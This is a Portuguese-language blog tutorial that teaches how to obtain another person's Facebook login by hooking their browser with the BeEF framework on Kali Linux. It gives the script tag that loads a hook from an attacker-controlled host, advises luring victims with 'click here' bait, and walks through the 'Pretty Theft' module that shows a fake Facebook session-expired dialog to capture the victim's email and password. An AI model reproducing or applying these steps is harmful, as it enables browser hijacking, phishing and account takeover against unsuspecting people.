Como obter credenciais do Facebook sem hackear o Facebook


Muitas pessoas vêm a até aqui procurando hackear o Facebook sem as necessárias habilidades para fazê-lo. O Facebook está longe de ser inviolavel, mas para isso, você precisará de algumas habilidades e aqui e um bom lugar para o desenvolvimento dessas habilidades.

Às vezes, se você tem um pouco de habilidade, um pouco de sorte e um pouco de engenharia social, você pode obter as credenciais do Facebook. É disso que se trata deste tutorial. Se você não tomar o tempo para instalar o Kali e aprender um pouco sobre redes e Linux, isso não funcionará para você – mas se você estiver disposto a demorar um pouco para estudar aqui  e no Null Byte, provavelmente você pode obter acesso Para credenciais de Facebook de alguém muito facilmente com este pequeno metodo.

(Todos os usuários do Facebook devem tomar nota disso se você não quiser ser hackeado.)

Passo 1: Instale o Kali (Se você ainda não tiver instalado)

O primeiro passo é baixar e instalar o Kali Linux . Você pode instala-lo como um sistema operacional autônomo, uma inicialização dupla (Dual Boot) com seu sistema Windows ou Mac, ou em uma máquina virtual dentro do sistema operacional de sua escolha. Não, isso não pode ser feito com o Windows! O Windows, com todos os seus pontos fortes e facilidade de uso não é um sistema operacional  apropriado para hacking.

Dentro do Kali, existe um aplicativo chamado Browser Exploitation Framework (BeEF). Ele será capaz de ajudá-lo a hackear o navegador da vítima e assumir seu controle. Depois de ter o controle do navegador haverá muitas  coisas que você poderá fazer, uma delas é enganar o usuário para dar suas credenciais do Facebook. É o que  vou mostrar aqui.

Passo 2: Abra o BeEF

Execute o Kali, Você será saudado com a tela abaixo. Agora inicie o BeEF clicando no ícone da vaca à esquerda da área de trabalho do Kali.

Ao clicar no icone o BeEF será iniciado em um terminal.

 

 

 

 

 

 

 

BeEF é uma aplicação que funciona em segundo plano em um servidor web instalado no seu sistema  que você acessa de um navegador. Uma vez que o BeEF esteja funcionando, abra o navegador IceWeasel para acessar sua interface. Você pode fazer login no BeEF usando o nome de usuário  beef e a senha  beef .

Você será direcionado a tela ‘Primeiros passos’ do BeEF.

Passo 3: Fisgue o navegador da Vítima

Esta é a parte mais crítica – talvez até a mais difícil – deste hack. Você deve fazer com que a vítima clique em um link de JavaScript especialmente projetado para “ligar” seu navegador. Isso pode ser feito de inúmeras maneiras.

A maneira mais simples é simplesmente incorporar o código em seu site e atrair o usuário para clicar nele. Isso pode ser feito por um texto como ” Clique aqui para obter mais informações ” ou ” Clique aqui para ver o vídeo “. Use sua imaginação.

O script parece algo como o abaixo. Insira-o em uma página da Web, e quando alguém clica nele, você sequestra seu navegador! (Comente abaixo se você tiver alguma dúvida sobre isso, você também pode usar o MitMf para enviar o código ao usuário, mas isso requer mais habilidade.)

<Script src = “http://192.168.1.101:3000/hook.js” type =” text / javascript “> </ script>

A partir daqui, vou assumir que você “Fisgou” o navegador da vítima e está pronto para possuí-lo.

 

Passo 4: Enviar uma caixa de Mensagem para o Usuário

Quando você ‘Fisgar’ o navegador da vítima, seu endereço IP, juntamente com os ícones do sistema operacional e do tipo de navegador, aparecerá no painel “Hooked Browsers”  à esquerda. Aqui, eu simplesmente usei meu próprio navegador para demonstrar.

Se clicarmos no navegador fisgado, ele abre uma interface BEEF no lado direito. Observe que nos  é fornecido os detalhes do navegador inicialmente. Ele também nos fornece uma série de guias. Para nossos propósitos aqui, estamos interessados ​​na guia “Comands”.

Clique na guia “Comands” e, em seguida, role para baixo a “Modules Tree” até chegar a “Social Engineering” e clique para expandi-la. Exibirá vários módulos de engenharia social. Clique em “Pretty Theft”, que abrirá uma janela “Module Results History” e “Pretty Theft”.

Este módulo permite que você envie uma janela pop-up no navegador do usuário. No nosso caso, estaremos usando a caixa de diálogo do Facebook.

Se clicarmos na caixa “Dialog Type”, podemos ver que este módulo não só pode criar uma caixa de diálogo do Facebook, mas também um LinkedIn, Windows, YouTube, Yammer e uma caixa de diálogo genérica. Selecione o tipo de diálogo do Facebook e clique no botão “Execute” na parte inferior.

 

Passo 5: A caixa de Mensagem aparece no sistema de Destino

Quando você clica em “Execute” no BeEF, uma caixa de diálogo aparecerá no navegador da vítima, Ela diz à vítima que a sessão do Facebook expirou e ele precisa inserir suas credenciais de acesso novamente.

Passo 6: Colhendo as credenciais

De volta ao nosso sistema na interface BeEf, podemos ver que as credenciais aparecem na janela “Resultados do comando”. A vítima inseriu seu endereço de e-mail “[email protected]” e sua senha “sweetbippy” e eles foram capturados e apresentados no BeEF.

 

 

 

 

 

 

 

Comentários

Tão vazio aqui... deixe um comentário!

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Barra lateral